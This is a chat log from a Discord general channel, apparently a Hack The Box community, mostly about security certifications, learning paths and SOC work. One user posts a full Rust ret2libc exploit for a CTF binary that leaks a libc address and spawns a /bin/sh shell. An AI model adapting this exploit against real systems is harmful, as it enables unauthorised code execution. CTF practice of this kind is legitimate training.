#general

1 messages Β· Page 405 of 1

stable tiger
#

like I understand i should be using rust

#

but

#

i dont care?

supple plume
#

elo in chess

meager kernel
#

Why is writing notes such a boring process

stable tiger
supple plume
stable tiger
#

i have autism

supple plume
stable tiger
#

that was like 3 years ago tho

#

so

supple plume
stable tiger
#

😭

warped plank
#

ngl Rust is goated, functions have unique types unless you explicitly set their types using pointer functions

supple plume
#

I will proceed to disbelief

stable tiger
meager kernel
#

I have to make notes on like 7-8 modules

stable tiger
meager kernel
#

That ive finished

warped plank
stable tiger
#

it's chess.com i don't care if you dont believe me 😭

exotic pendant
#

πŸ˜„

supple plume
#

aright all good

#

time to lock tf in

#

go to sleep frosto

meager kernel
#

@exotic pendant hello

exotic pendant
#

Got back late but the kid and I did a 1 shot DnD game last night

meager kernel
stable tiger
#

that being said, my payloads should not be in C given there are literally projects dedicated to finding vulnerabilities in malware code to stop them (eg ransomware)

warped plank
stable tiger
meager kernel
#

I just remembered, i have to start learning Java for college

exotic pendant
stable tiger
#

i am literally a bash C and go enthusiast

winter tendon
#

Is there any htb staff available that can help me with an icky issue

stable tiger
#

i like what it does i dont like writing it

meager kernel
#

@stable tiger how did you learn Java?

exotic pendant
#

Rust is the best

stable tiger
warped plank
lofty warren
meager kernel
exotic pendant
meager kernel
stable tiger
#

thats not me saying dont

meager kernel
stable tiger
#

tahts me asking how youd learn it

meager kernel
exotic pendant
#

I need to count my CVEs

#

i'm around 50-60

meager kernel
lofty warren
meager kernel
#

Buy me nitro now

stable tiger
meager kernel
#

πŸ˜„

lofty warren
exotic pendant
meager kernel
stable tiger
#

ive never touched cups

meager kernel
#

I have CJCA token and CPTS token
The CPTS token can be exchanged for any other exam too

exotic pendant
#

Either can use the time to find more bugs or make exploit

stable tiger
#

oh shit fair enough

#

@meager kernel learn from a practical project

#

in java

#

find a usecase

exotic pendant
stable tiger
#

gui for example

meager kernel
#

Alright

stable tiger
#

just write a gui frontend for a tool you frequently use

exotic pendant
#

I will admit 1 bad thing for Rust

#

GUI

muted olive
stable tiger
#

like drawing in C++ is cancer

exotic pendant
#

Ye but Rust is the best

stable tiger
#

frost how many of your projects are in rust

exotic pendant
#

Yes

stable tiger
#

understandable

exotic pendant
#

I rewrote pwntools in Rust

stable tiger
#

im going to look at your githu now

exotic pendant
#
use pwnt::*;
use std::io;

#[tokio::main]
async fn main() -> io::Result<()> {
    let binary_path = "./rocket";
    let libc_path = "./glibc/libc.so.6";

    let elf = Elf::new(binary_path).expect("Failed to load binary ELF");
    let libc = Elf::new(libc_path).expect("Failed to load libc ELF");

    let mut  target = Target::process(binary_path).expect("Failed to spawn binary process");

    let padding = vec![b'A'; 40];
    let ret = elf.search("ret").unwrap();
    let pop_rdi = elf.search("pop rdi; ret").unwrap();
    let main_addr = elf.symbols.get("main").unwrap();
    let puts_plt =   elf.plt.get("_end").unwrap();
    let puts_got = elf.got.get("puts").unwrap();

    println!("pop_rdi: 0x{:x}", u64(&pop_rdi).unwrap());
    println!("ret: 0x{:x}", u64(&ret).unwrap());
    println!("puts_plt: 0x{:x}", u64(puts_plt).unwrap());
    println!("puts_got: 0x{:x}", u64(&puts_got).unwrap());
    println!("main_addr: 0x{:x}", &main_addr);

    let payload = combine(padding + &ret + &pop_rdi + &puts_got + &puts_plt + &main_addr);
    
    target.sendlineafter(b">>",&payload).await?;
    target.recvuntil(b"Preparing beta testing..\n").await?;

    let leak_addr_bytes = target.recv(6).await?;
    let leak_addr = u64(&leak_addr_bytes)?;
    println!("Leaked address: 0x{:x}", leak_addr);
    
    let libc_puts = 0x80e50; //libc.symbols.get("puts").unwrap();
    let libc_base = leak_addr - libc_puts;
    println!("libc base: 0x{:x}", libc_base);

    let system_addr = libc_base + 0x050d70; //libc.symbols.get("system").unwrap();
    let bin_sh_addr = libc_base + 0x1d8678; //libc.search("/bin/sh").expect("Failed to find /bin/sh in libc");

    let second_payload = flat(vec![
        &padding,
        &ret,
        &pop_rdi,
        &p64(bin_sh_addr),
        &p64(system_addr),
    ]);
    
    target.sendlineafter(b">>", &second_payload).await?;
    target.interactive().await?;

    Ok(())
}
stable tiger
#

That's actually very cool

#

thank you for your service btw (even tho im not from the us)

exotic pendant
#

Used it in a CTF

stable tiger
#

so why is the repo empty

exotic pendant
stable tiger
#

yea im looking

exotic pendant
#

i didnt release ityet

stable tiger
#

ah

#

plz release

exotic pendant
#

I gotta clean it up

#

but one day

tough oyster
stable tiger
#

make a windows equivalent

stable tiger
exotic pendant
warped plank
tough oyster
#

UHHH

stable tiger
tough oyster
#

YOU FUCKED UP

warped plank
#

@unborn fable no, that's illegal

exotic pendant
unborn fable
#

ethical use

exotic pendant
#

same with regular pwntools in python

unborn fable
#

please

warped plank
stable tiger
unborn fable
#

i’m being threatened

exotic pendant
tough oyster
warped plank
#

CONTACT THE POLICE, you've been told before

stable tiger
tough oyster
#

ya done mate

exotic pendant
stable tiger
austere sigil
exotic pendant
#

Forgot about it

#

Found a bug in code last night, decided to fuzz while I was at DnD

stable tiger
#

ping me if you ever get those crt functions working on ur rewrite, i'll move to rust for all projects when that's done

exotic pendant
#

I'll have to get the motivation to continune the project. I might be burnt out a little

stable tiger
#

cos that's legitimately useful to speedrun exploit code built into payloads for eg

exotic pendant
#

I got all the offsec certs in 2-3 months and then got lazy

stable tiger
#

how was the osee

exotic pendant
#

ok all offsec certs that ent provides

stable tiger
#

their website glazes it but from everyone i know sec760 is harder

exotic pendant
#

OSEE is seperate saddly

tough oyster
stable tiger
exotic pendant
#

OSED was ezpz

stable tiger
#

figures isnt it only stack?

exotic pendant
#

mostly and 99% of it is just bypassing stuff like SEH

stable tiger
meager kernel
stable tiger
#

i might just get the cert for the resume ngl

meager kernel
#

Oh he got banned

#

Nvm

exotic pendant
stable tiger
#

do they force ida or can i use binja in the exam?

exotic pendant
#

ida free

#

I wasnt able to use my pro

stable tiger
#

syllabus literally says pro 😭 no way

exotic pendant
#

lol they wouldnt give you pro

#

but i think they do that to prevent you using plugins

stable tiger
#

Yeah that makes sense tbh

#

I'd rather do the sans courses but fuck man theyre expensive

exotic pendant
#

I want to get SANS done eventually

signal mica
#

Frojbite

stable tiger
exotic pendant
#

Yea would be nice

exotic pendant
stable tiger
#

hyper-v kernel and secure kernel broker 0day would be a crazy class

exotic pendant
#

My hyper-v escape was approved

#

just need them to fix and pay

#

same with my RDP escape

stable tiger
#

does it let you modify enclaves?

#

write a VBS enabled LSASS dumper lmao

signal mica
#

spotify api integration has been disabled for 3 weeks

exotic pendant
#

just vm-> host user

stable tiger
#

ah that's a shame

exotic pendant
#

but it works with RDP also

#

so 2 in 1

stable tiger
#

i swear you can pop open 50% of windows drivers and just find a bug staring at you

#

i found 2 UAFs by just spam looking for calls to free memory lol

signal mica
stable tiger
#

i was bin diffing the patch to the cloud filter driver they did a month ago and saw it

exotic pendant
#

Watch Microsoft "I'll give $10 for the bug"

stable tiger
#

but they did just fix an lsass rce, so that might be worth looking at the bitch for

stable tiger
exotic pendant
#

It says Hyper-V bugs pay up to 250k

#

but 250k with full poc

stable tiger
#

looks like you're getting a new car

exotic pendant
#

I already paid for a new car

#

with bugmoney

stable tiger
#

what'd you get

exotic pendant
#

Kia k4

stable tiger
#

Valid

#

How much do RDP escapes pay?

signal mica
#

nodejs looking ahh car

exotic pendant
#

No idea because I've never seen one before

#

Cups bug is just another off by one

#

all 5 crashes

stable tiger
#

checks out

exotic pendant
stable tiger
#

frost how old are you

exotic pendant
#

30

stable tiger
#

fuark

exotic pendant
#

old man

stable tiger
#

not even

exotic pendant
stable tiger
#

i thought older given the military service

#

and the knowledge

exotic pendant
#

I was just a Sr Sysadmin in the Navy

#

but got a good foundation of AD and other services from it

fiery copper
#

Guys I AM EVIL. The bad act I`ve done: said mean stuff on the internet.

exotic pendant
#

18 year old frost straight to the persian gulf as a Sr Sysadmin. Had to learn fast

stable tiger
#

thats what im finna do

exotic pendant
#

Military?

stable tiger
#

im considering airforce cybersec here but theres also our NSA equivalent

exotic pendant
#

What country

stable tiger
#

australia

exotic pendant
#

Nice

muted olive
stable tiger
#

we have a degree requirement here tho so it's a bit of a pain

exotic pendant
#

lol

stable tiger
#

do whatever you want while you find bugs

exotic pendant
#

I just patched it and rerunning

#

so i can find further bugs

#

I am going to force myself to play fallout today

stable tiger
#

which one

#

im waiting for season 2 to be fully released before i binge it

exotic pendant
#

I've started fallout 4

stable tiger
#

4 is solid

#

i like 3 tbh

#

new vegas is obviously great but i prefer 3

exotic pendant
#

I saw they're remaking 3

#

so I'll play the remake

stable tiger
#

they're remaking 3????

static bloom
#

forcing yourself to play fallout is honestly crazy πŸ˜„

exotic pendant
#

and New Vegas eventually

stable tiger
#

wdym forcing

stable tiger
exotic pendant
#

playing games isnt as easy

stable tiger
muted olive
static bloom
stable tiger
exotic pendant
#

kidding

signal mica
exotic pendant
#

my electric bill is cheap like $80

signal mica
#

why would i focus on that bs its too slow

stable tiger
#

frost why did you get so many certs 😭

exotic pendant
exotic pendant
stable tiger
#

bars

sturdy thistle
#

Helllooo

winter tendon
#

Is there a way to check account creation date on HTB? In any way shape or form cause my mails arent synchronized to my new phone

exotic pendant
static bloom
#

i'll teach you about minecraft, you teach me advanced exploitation

#

sounds like a good deal

muted olive
exotic pendant
#

offbywon

muted olive
muted olive
#

looks interesting

exotic pendant
#

on the host, not even in a vm

#

well

#

adocker container

muted olive
#

nice

stable tiger
#

then practice

muted olive
#

speaking of vms I tried to find a vm escape in virtualbox today, no luck prayge

stable tiger
#

thats the easiest beginner way to do ts

static bloom
muted olive
#

I did find very interesting things tho

exotic pendant
#

I need Microsoft to finish what I reported and then maybe I'll hit hyper-v more

muted olive
#

Wouldnt be vulns but would be cool in a red team playbook

exotic pendant
#

my vmware bug was approved but they just added me to the hof

muted olive
#

no they patched it well lol

#

defensive measures were interesting to see

#

they do a lot of checks

muted olive
stable tiger
#

why does offsecs exploit dev essentials course cover arm assembly not x86 πŸ’€

exotic pendant
#

BBC new told me they're mailing me a shirt for the XSS i found

#

silence

muted olive
#

@exotic pendant that RCE gadget I found, do you think they'll accept it if the XSS isn't there? because I couldn't find anything

#

confirmed the gadget works though

exotic pendant
#

Nah

#

you need the XSS

muted olive
#

πŸ˜”

exotic pendant
#

if you cant execute it, then it'll be denied

muted olive
exotic pendant
#

nah they wont take it lol

muted olive
#

yeah πŸ˜”

#

did find something interesting recently tho

#

old CVE which was supposed to be patched on my version of windows still works

#

and I have the hotfix for it installed already

exotic pendant
#

SkeletonDance nice nice

#

can report then if you bypass the fix

#

Time for le gym

muted olive
#

yeah I did bypass.. didnt work on win11 but that was expected

signal mica
#

enjoy

warped plank
gray wraith
#

Pizza bday party today

#

I will eat only pizza

signal mica
gray wraith
tough oyster
random grove
#

Can I ask someone about machine submission?

livid narwhal
#

help

subtle plover
#

i can help

livid narwhal
cerulean bloom
zealous charm
elder lichen
#

yo finally i am back after 1 Year πŸ˜‹

upbeat tangle
#

Welcome back

novel oriole
#

hello guys

#

i need some help

fiery copper
novel oriole
#

i just started learning cyber sec, bought the student subscription on someone's advice and enrolled in the junior cybersec analyst jon path but it has alot of theory which makes me feel like im not doing anything and ill forget all this anyway lateron.. what to do? should i comeplete it or skip it and go directly to pentester path?

fiery copper
#

Make notes and watch videos

meager kernel
#

if you forget it, in the future you can quickly read up on it

novel oriole
#

so u do recommend me to finish it ehh]

fiery copper
novel oriole
#

but this will take forever before i even begin to do the actual stuff.. is it meant to be this way?

fiery copper
novel oriole
#

ahhh the problem is that my parents wont see me doing anything lol

upbeat tangle
meager kernel
#

but if you grind straight up for 1-2 years, you will see the difference

fiery copper
upbeat tangle
#

Take a hammer and smash your keyboard, then you do something

novel oriole
#

ahh.. is it realistic to expect completition of pentester path along w cpts by the end of this year? i wanna see how u people imagine it

meager kernel
#

@novel oriole yes cybersec takes alot of time
its natural
it took me 1 year just to get past the fundamentals and start doing HTB machines

#

but its alright

#

all great things take time

upbeat tangle
#

you can grind all day every day

novel oriole
elder lichen
#

see this msg ☝️ , was my last 2025 msg . and there was one more msg i deleted i am 17 so i can't buy htb so they ban me for 1 year i be 18 . but now i am 21 , good job moderators.

novel oriole
#

rn i have 2.5 months holidays

upbeat tangle
#

You can grind and smash the fundamentals in those 2.5 months

#

and you will be on your merry way already

novel oriole
upbeat tangle
#

All you need is to believe

meager kernel
novel oriole
muted olive
upbeat tangle
muted olive
#

@meager kernel is your pay in USD?

#

(monthly)

upbeat tangle
#

I believe in you ibraheem

novel oriole
novel oriole
meager kernel
wintry zodiac
#

guys how do you think playing HTB and CTFs has benefitted you?

fiery copper
upbeat tangle
#

Kratos gets paid in "hopes and dreams"

fiery copper
#

I am sure, not only believe that you will be good

#

it just takes time

fiery copper
#

trust urself

upbeat tangle
novel oriole
#

well, lets see.. ill grind properly from now

fiery copper
upbeat tangle
novel oriole
#

btw guys

#

CPTS VS OSCP any idea?

#

i heard that cpts makes u more skillful and oscp is just more recognized

upbeat tangle
#

If we have any of the veterans logged in they can answer that for you

novel oriole
#

i see..

fiery copper
novel oriole
#

well cpts then

upbeat tangle
#

Im just here for the shits and giggles, trying to avoid to do as many certs as possible Kappa

fiery copper
#

I saw a lot of companies willing to pay for OSCP if you perform security tasks or pentesting

novel oriole
#

but rn my distance from cpts is like distance from earth to neptune

upbeat tangle
novel oriole
upbeat tangle
#

You also need to enjoy your jouney

#

if you dont enjoy the journey, the end goal is not going to save you

supple plume
#

Vro...

novel oriole
#

well back in my OS classes in uni i enjoyed commandline work especiialy in linux thats all i can say for now

supple plume
#

I went to buy milk I never bought it

upbeat tangle
#

echoes....

fiery copper
fiery copper
supple plume
austere sigil
fiery copper
upbeat tangle
fiery copper
#

Im trying to remember SQL and check thru microsoft excel

upbeat tangle
#

When im reading about something, after 90 minutes its just a fog and its pointless to read anymore

novel oriole
muted olive
upbeat tangle
lofty warren
upbeat tangle
#

Passion never gets boring

muted olive
#

Yeah... whereas zero passion in the academic stuff I'm doing right now so I see the contrast

novel oriole
#

anyway... thank you all.. you really boosted my morale πŸ™‚

cyan crater
#

hi everyone

#

when is everyone usually online?

muted olive
#

earth is round, so it depends

upbeat tangle
cyan crater
#

and how can i start learning?

muted olive
novel oriole
#

one last question.. i have a strong grip on JAVA.. so in cyber sec which one should i shift to? python or rust?

tidal light
#

What does blue team do

molten bobcat
muted olive
novel oriole
upbeat tangle
tidal light
muted olive
cyan crater
gaunt marsh
#

Is there a channel where I can ask for job help?
Sorry if this is a dumb question.

muted olive
novel oriole
upbeat tangle
novel oriole
muted olive
novel oriole
muted olive
#

you say you're comfortable with C? πŸ‘€

molten bobcat
#

Blue team folks are responsible for defending networks

tidal light
molten bobcat
#

It is what I do

upbeat tangle
#

C1oud the resident blueteamer

austere sigil
#

Na, teams and excel

muted olive
novel oriole
cyan crater
novel oriole
#

in java i have made many many projects

muted olive
tidal light
muted olive
#

We shall spar to the death

muted olive
#

Would be a good learning experience

upbeat tangle
#

Metasploitable is great fun, just setup a nat network between your attacker and metasploitable

muted olive
novel oriole
#

did u all also feel like im feeling nduring ur entry into the cyber sec world?

muted olive
#

If you're talking about red team/blue team stuff then you can start learning on HTB

cyan crater
#

its hard

muted olive
#

thats why its fun

#

πŸ˜„

cyan crater
#

bcuz it doesnt teach you the concepts

tidal light
upbeat tangle
muted olive
cyan crater
# muted olive what doesn't?

you have to search the answer of each question and suvmit it, so what's the point of learning if you have to copy paste answers?

molten bobcat
#

Love of my life 🎢

muted olive
#

That's how you learn

upbeat tangle
lofty warren
muted olive
cyan crater
cyan crater
#

ok

muted olive
muted olive
#

You dont copy paste from a walkthrough, if that's what you're imagining

tidal light
muted olive
molten bobcat
#

Just like in life there are questions that don't have immediate answers

cyan crater
#

the first thing i saw was the machines

cyan crater
muted olive
#

yeah, there's academy as well πŸ˜„

#

and CTF platform

molten bobcat
#

Yeh it's a bit confusing admittedly

muted olive
#

@molten bobcat did you do the holmes CTF? I think it was there sometime in october last year

molten bobcat
#

I haven't done anything in a while

upbeat tangle
#

Acadam.... 😴 noo im joking guys dont kill me Kappa

molten bobcat
#

Focused on work

muted olive
#

it was a blue team ctf

#

I thought youd be the first person whod play lol

cyan crater
molten bobcat
muted olive
cyan crater
#

where?

muted olive
#

but the best option is here

cyan crater
#

and idk what to learn

tidal light
molten bobcat
#

We have no clue dude lmao it's the internet

muted olive
#

-# totally havent been hired to say this

molten bobcat
#

It's huge

cyan crater
muted olive
west lynxBOT
molten bobcat
#

I mean hi I work blue team now

muted olive
#

Blue team is admittedly a lot harder than red team

#

a LOT harder

tidal light
upbeat tangle
#

You can learn the same things from being an intern learning from older guys, you can learn it from books, you can learn it from other platforms, you can learn it from academy, you can also just grind for years on your own and fail over and over until your learn the correct way. Theres many roads to the same goal

muted olive
#

I mean you can learn blue teaming if you want to and you can excel at it

#

Just that in general, its hard

molten bobcat
#

Most blue team tools are things that make data manipulation easier

muted olive
#

Or at least thats how I find it

molten bobcat
#

I'm a SOC analyst for a living my most used program is Excel lol

muted olive
#

Like a process hollowing attack

muted olive
#

I could theorize ways like a five second integrity health check on every running process

#

but idk how you would usually do it

molten bobcat
muted olive
molten bobcat
#

I know

muted olive
#

(imo)

tidal light
molten bobcat
#

But the parent and child processes of a process that's been hollowed out will differ from the norm

cyan crater
molten bobcat
tidal light
molten bobcat
cyan crater
#

guys i have a question that doesnt let me sleep

molten bobcat
sturdy thistle
#

Just ask

cyan crater
#

do i learn how to use the tools?

#

wont that be so hard

muted olive
molten bobcat
#

Most things in life worth doing aren't easy buddy

sturdy thistle
#

I bought new coffee beans

supple plume
#

WHO DOESNT WANT TO READ HERE I WILL SEND THEM THE 10 PLAGUES OF EGYPT

tidal light
molten bobcat
#

By far

sturdy thistle
#

@austere sinew

muted olive
muted olive
#

in academy

cyan crater
meager kernel
cyan crater
#

just tell me

molten bobcat
#

Dude

#

We can't

muted olive
#

I'm telling you, just start lol

cyan crater
#

why?

muted olive
#

Start and dont question yourself

#

You'll get it

sturdy thistle
#

There is no way for all

molten bobcat
#

Because that's not how this field works haha

cyan crater
#

so how does that work?

#

thats the question

molten bobcat
#

I'd love to tell you immediately what works best for you but you have to discover it for yourself

sturdy thistle
#

Using brain

cyan crater
#

i dont have brain

muted olive
#

Start doing that intro to security module in academy, or whatever its called

cyan crater
#

i have rotted brain

muted olive
#

Go from there

#

do the next one

#

and the next one

#

and the next one

#

and so on

sturdy thistle
#

And so forth

cyan crater
#

is it free?

muted olive
#

tier 0 modules are free

sturdy thistle
#

Check the site

muted olive
#

that means basics so in general, yes

molten bobcat
#

But what I mean about process hollowing is that it's intent is to hijack a binary and execute what you want using it as a disguise yes?

sturdy thistle
#

You literally see what’s free and what’s paid

cyan crater
#

so how am i going to find out answers to my questions?

muted olive
molten bobcat
# muted olive Yes, that

Yeah you'll make the binary start behaving strangely and executing things it doesn't normally do

sturdy thistle
#

Doing the content?

molten bobcat
#

I can see that

muted olive
cyan crater
#

i have more question btw

sturdy thistle
#

Then just ask

molten bobcat
muted olive
molten bobcat
#

Lol

sturdy thistle
#

SIEM exists

muted olive
#

Assuming you're just tracking behaviour

#

No integrity stuff

molten bobcat
#

Regardless of what you do to this process, you have to make noise on the process history

sturdy thistle
#

I learned thst in btl1

molten bobcat
#

If I see svchost.exe executing whoami

#

I'm killing you immediately

sturdy thistle
#

Disclaimer: the process

#

Not the person kek

molten bobcat
#

No I'm killing him too

sturdy thistle
#

Ok nvm

molten bobcat
#

I'll just start with the process

austere sigil
molten bobcat
lofty warren
sturdy thistle
#

Hitman

molten bobcat
#

How do you think I get rid of persistence?

#

I hit them with a brick

sturdy thistle
#

Starting with process

#

Oh fair

molten bobcat
#

Look man someone trying to establish persistence at a high school in Texas needs to be hit with a brick full speed

muted olive
sturdy thistle
#

It will be seen

muted olive
#

and it resumes with normal thread context

molten bobcat
#

Good

#

Leaves a message for the others

#

I will turn you into a red stain on the highway if you fuck with my clients lmao

lofty warren
muted olive
#

I'm just trying to think of ways the blue team can see your shit

molten bobcat
#

I'm completely leaving out detection technologies

#

Just talking about ways I myself could see it

muted olive
#

@molten bobcat assuming no EDR, how would you defend against hell's gate or something?

molten bobcat
#

I don't know what hells gate is aside from a sephiroth ability lmao

muted olive
#

lol

molten bobcat
#

Uhh I'd hold my arms out and stop it

muted olive
#

extracting call numbers at runtime to perform syscalls to kernel directly

#

is hell's gate

molten bobcat
#

Never heard or seen it

#

I'd say we cover about 90% of security shit

#

I say this

#

With the caveat

#

That a lot of things that happen to clients are their own fuckin fault lmao

muted olive
#

Which is the best solution which I can think of

molten bobcat
#

"this IP is not on our network"

muted olive
#

Investing in a good EDR

molten bobcat
#

Homie it signed in to your domain controller

#

Guess the fuck again

muted olive
molten bobcat
#

Nah this is

#

Analysts who work there

#

Telling me this

#

Just as clueless as anyone

balmy basalt
molten bobcat
#

I'm so fuckin tired of dcs being public bro

#

Why

#

Why would you do this

#

CUZ IT HAS A WEBSERVER

#

WHY

#

SAME QUESTION BRO

muted olive
#

They're public? πŸ’€

molten bobcat
#

WHY WOULD YOU DO THIS

muted olive
#

Who the fuck runs a webserver on a DC?

molten bobcat
#

I love working in cybersecurity so much guys

drifting shoal
#

why hacknet doesn't work?

molten bobcat
#

You get trained to stop hackers and then it's the clients who are letting them the fuck in

muted olive
molten bobcat
#

Clickfix

#

Rreeeee

muted olive
#

if so I'm gonna have a fun time if I'm contracted by your company 🀣

muted olive
molten bobcat
#

Yes

muted olive
#

new stuff I havent really looked into

molten bobcat
#

Copy paste this malicious powershell into your terminal to verify you're a human prayge

muted olive
#

also you'd have to be exceptionally dumb to believe that but whatever

#

lol

molten bobcat
drifting shoal
#

I just started the box

muted olive
#

... ok that speaks volumes about the victims kek

molten bobcat
#

Correct most people are morons help sadglas

muted olive
#

I recently found a domain used by some Chinese APT... and it was still active
I could use all the functionality lol

#

And you could blatantly tell it was attacker infra

molten bobcat
#

I try not to touch attacker infra if I can

balmy basalt
molten bobcat
#

They startle like pigeons

muted olive
#

It was fun to interact and see how they designed it.
They pulled the frontend from Facebook and it still had Meta's footers in it LOL

molten bobcat
#

Of course it does lmao

molten bobcat
#

They just copy paste it

drifting shoal
#

@ornate ibex

muted olive
#

nearly identical

muted olive
#

except the forgot password and create new account buttons didnt work lmfao

#

but otherwise looks the same at first glance

molten bobcat
#

Yep

#

Cred stealer

muted olive
#

you enter your creds in the near identical google login, attacker connects and sends you an MFA prompt

molten bobcat
#

The classic

#

Token stealer too

#

I find those a lot

drifting shoal
#

I can ping it but when i try to recon, it's looking like the machine is off

muted olive
fiery copper
#

you can do it

drifting shoal
#
nmap 10.129.232.4

Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-17 09:46 EST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.11 seconds
lofty warren
drifting shoal
#
ping 10.129.2.251
PING 10.129.2.251 (10.129.2.251) 56(84) bytes of data.
64 bytes from 10.129.2.251: icmp_seq=1 ttl=63 time=45.0 ms
64 bytes from 10.129.2.251: icmp_seq=2 ttl=63 time=46.8 ms
64 bytes from 10.129.2.251: icmp_seq=3 ttl=63 time=46.2 ms
fiery copper
molten bobcat
#

I usually enter gofuckyourself@domain.com

drifting shoal
#

It's on

#

oh

balmy basalt
drifting shoal
#

my bad

molten bobcat
#

Yeh not talking to you lentho

#

I was talking about what I put in cred stealer links to test them

#

I often like to tell attackers to go to hell

muted olive
#

Ironically the attacker is supposed to connect with you to send you the MFA prompt so the password you entered is still "processing"

molten bobcat
#

Mhm

muted olive
#

attacker didn't send me an MFA prompt though :(

molten bobcat
#

I had a phishing page that had web elements that mimicked a Microsoft edge popup window for creds

muted olive
#

they saw my password, I bet kek

muted olive
#

I say this because I'd spot "off" elements in google but microsoft keeps updating their pages all the time

#

microslop

molten bobcat
#

I stared at it, and tried to click and drag the Microsoft edge window, WHICH WORKED

#

But it doesn't drag outside of the browser window

molten bobcat
#

Because it's part of the website

muted olive
#

you can drag popups

molten bobcat
#

It's not a popup

muted olive
#

oh πŸ‘€

molten bobcat
#

You're not understanding me

muted olive
#

my bad

molten bobcat
#

The site animated and programmed

#

A false window

#

That behaved like a normal window

#

Except it was part of the website

#

No popup

muted olive
#

that is kind of cool

#

the three top buttons worked like normal too?

molten bobcat
#

It mimicked a Microsoft edge browser window

#

No they did nothing lmao

#

They highlighted on hover but no click functionality

muted olive
#

they shouldve tbh

molten bobcat
#

It's designed to be a cred stealer so it doesn't go away easy

muted olive
#

to this day I don't know what this above thing did kek

#

or whatever that link is supposed to be

#

I forgot

molten bobcat
#

Does it bounce around and sing

past wigeon
#

I didn't ask chat gpt (because I hate AI and find more value in advice from lived experiences) but does anyone know if there's a way to have multiple ideally simultaneous connections to different GitHub accounts on terminal so you can make commits to diff repos associated with those separate accounts?

molten bobcat
#

You are an idiot

#

Cuz if so that's 90s era malware haha

past wigeon
molten bobcat
#

Sorry 2009-2012 era

#

YouAreAnIdiot | Malware Database Wikia | Fandom https://share.google/bSDPVGwOdiIqpKDp2

Malware Database Wikia

YouAreAnIdiot was a trojan horse in 2009-2012. When the user goes on the website, the trojan would show text saying "you are an idiot" with 3 smiley faces, and the browser window would bounce...

past wigeon
#

Oh. Lol

muted olive
molten bobcat
#

Yep

muted olive
#

I killed it with task manager

past wigeon
#

Ok I knew that one under a much different name

molten bobcat
#

It's using JavaScript to make the windows dance around

grizzled urchin
#

when does season 10 start

past wigeon
#

And different method of trolling

#

One that was likely to get you grounded if you were a kid

molten bobcat
#

Free cupholder executable that would open the CD tray

past wigeon
muted olive
#

I mean obviously it is but

molten bobcat
muted olive
#

This means I found something new to do with XSSes

molten bobcat
#

If you read the link I said

fiery copper
molten bobcat
#

It does mention it's a js trojan

grizzled urchin
# past wigeon 6-7 days

awesome, appreciate the info. im getting decently far in my classes and im excited to keep the progress going

past wigeon
muted olive
#

I'll try that out nxet time 🀣

past wigeon
grizzled urchin
past wigeon
balmy basalt
molten bobcat
#

Okay I'm gonna roll out of bed now

gray wraith
molten bobcat
#

I've only ever seen a YouTube video of it lol

past wigeon
gray wraith
#

Or it couldve been the other one with a "flipping sausage"

#

That Played you spin me

balmy basalt
molten bobcat
vital valley
#

Hi guys, Im beginner and was wonderying if you would recomend the tryhackme premium ? Im asking here because I guess perhaps some of you tried it and can give objective opinion. Thanks.

meager kernel
#

also THM was involved in many controversies regarding stealing user data and all

#

so i would recommend to stay away from them

molten bobcat
rustic carbon
#

hi

past wigeon
# balmy basalt Not specifically. IP address would still be consistent between all of them for e...

Oh that's no problem. Appreciate the ace advice. Basically just do all my notes and rough drafts for box write ups on a GitHub account with a username that matches my discord name. This is the manner I spend most my time so it just makes sense. Now i need to write some code for my portfolio tho and I don't want a potential employer seeing some weird name that may not make sense to them and a daft punk pfp ya feel me?

past wigeon
#

Let me guess nothing happened?

balmy basalt
past wigeon
#

Ah too easy then.

fiery copper
#

most beautiful women are those true to themselves

#

most beautiful men are those true to themselves

fiery copper
signal mica
#

mariodev rn

subtle plover
#

letsgo

fiery copper
past wigeon
sturdy thistle
zealous charm
fiery copper
subtle plover
sturdy thistle
#

Same

#

I even forgot which repo that is lol πŸ˜‚

cerulean bloom
scenic maple
wanton dock
#

stimming rn

mystic patio
#

And why im not there

raven rain
fiery copper
signal mica
past wigeon
sturdy thistle
ornate ibex
subtle plover
#

everyone fell for it

exotic pendant
#

πŸ˜„

#

Frosto dieting going better than expected

#

can already see striations in muscles

molten bobcat
#

I'm starting studying today

#

Well, continuing I guess

obtuse fern
meager kernel
wanton dock
#

is arc raiders any good

wanton dock
#

i need to buy battlefield 2042

#

no more battlebit remastered

meager kernel
wanton dock
#

oh shit yeah battlefield 6 my bad

#

i cant get over this it's so funny

#

i like battlebit remastered because it can feel like an actual battle where you have to work with your team in a more realistic sense. when i played battlefield 4 everyone was always on their own or with a designated squad

#

although this was over 10 years ago

lofty warren
wanton dock
#

had to get my morning stim in

fierce osprey
#

thank you for this advice

rapid badger
mystic harbor
white trench
#

Write-up of this new-retired web challange in HTB
Web Cache Deception Exploitation | CDNio HTB
https://www.youtube.com/watch?v=3lb1SHWe8WU

This is a technical video regarding Web Pentest for educational purposes, where I perform a code review of the machine https://app.hackthebox.com/challenges/CDNio?tab=play_challenge

β–¬β–¬β–¬β–¬β–¬β–¬β–¬β–¬β–¬β–¬β–¬β–¬β–¬β–¬β–¬β–¬β–¬β–¬β–¬β–¬β–¬β–¬β–¬β–¬
Interesting links related to the topic:

  • My Web Cache Deception exploitation tool:
    https:/...
β–Ά Play video
wanton dock
molten bobcat
#

Same actually

#

Except in half an hour I begin studying

#

So I vibe for a little bit

wanton dock
#

i need to do hack the box academy too

#

i be spending long time on singular modules

molten bobcat
#

I unfortunately have to do it alone or I won't be as efficient as I'd like

wanton dock
#

that's alr

molten bobcat
#

I kinda have to sequester myself away to get shit done

wanton dock
#

same

molten bobcat
#

I'm making coffee tho

#

I'm prepared

wanton dock
#

ive got diet coke and an oven pizza

#

im honestly so bored dude

#

i dont understand why i dont just do academy or read

#

i used to love reading

molten bobcat
#

I've found that feeling bored goes away now that I'm on ADHD meds

#

I'm pretty good at finding something to do now

wanton dock
#

when did you start them? recently?

molten bobcat
#

Few months ago

wanton dock
#

ah ok

#

i find discord slightly addictive for some reason

#

procrastination

molten bobcat
#

Eh I've made valid genuine connections

#

So it's fine

lofty warren
wanton dock
wanton dock
#

genuine issue

#

when i first started adhd meds i was a bullet

#

it's been a few years now though

molten bobcat
#

I try not to focus on what it can do for my productivity

#

Because I don't give a fuck about that

#

I care about whether or not I can keep my emotions in check or wake up without anxiety

wanton dock
#

that's valid

#

time to put myself in my place, retreat into my cave with a single ethernet cable inside of it i dug out of the ground, connected to an super thin office desktop full of dust, and do htb academy

#

🫑
